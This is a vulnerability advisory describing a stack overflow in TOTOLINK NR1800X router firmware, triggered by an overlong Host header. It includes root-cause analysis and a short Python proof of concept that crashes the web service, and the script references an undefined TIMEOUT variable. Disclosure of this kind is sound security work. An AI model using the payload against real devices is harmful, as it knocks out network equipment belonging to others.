# TOTOLINK NR1800X Firmware Stack Overflow Vulnerability Summary ## Vulnerability Overview A stack overflow vulnerability exists in the HTTP request parsing logic of the TOTOLINK NR1800X firmware. An unauthenticated attacker can trigger memory corruption by sending an excessively long `Host` header, resulting in service crash (DoS). ## Scope of Impact - **Vendor**: TOTOLINK - **Affected Product**: C834FR-1C (NR1800X) - **Affected Firmware Version**: V9.1.0u6279_B20210910 - **Firmware Download URL**: https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/225/idu/36.html ## Remediation No official patch or upgrade recommendation is currently provided on the vendor's page. It is recommended that users contact the vendor to obtain security updates or deploy firewall rules at the network perimeter to restrict anomalous HTTP requests. ## POC Code ```python #!/usr/bin/env python3 import socket TARGET = "192.168.211.128" PORT = 80 PATH = "/formLoginAuth.htm?authCode=&action=login" def send_once(host_value: str): req = ( f"GET {PATH} HTTP/1.1\r\n" f"Host: {host_value}\r\n" "Connection: close\r\n\r\n" ).encode() with socket.create_connection((TARGET, PORT), timeout=TIMEOUT) as s: s.sendall(req) payload = "A" * 0x400 send_once(payload) ``` ## Vulnerability Details 1. The entry point is the normal HTTP request processing function `http_request_parse`. 2. The `Host` header value is extracted and forwarded to `find_host_ip`. 3. `find_host_ip` performs a byte copy operation without strict length validation. 4. The destination in the caller is a small stack buffer (`char v113[32]`), leading to a risk of stack overwrite. 5. Sending a long `Host` value (e.g., 512+ bytes) can reliably corrupt or crash the service in the firmware/lab environment. ## Impact - **Before Attack**: The target web service responds normally (e.g., 302 redirect). - **After Attack**: After sending a long Host header, the service becomes unavailable (connection refused).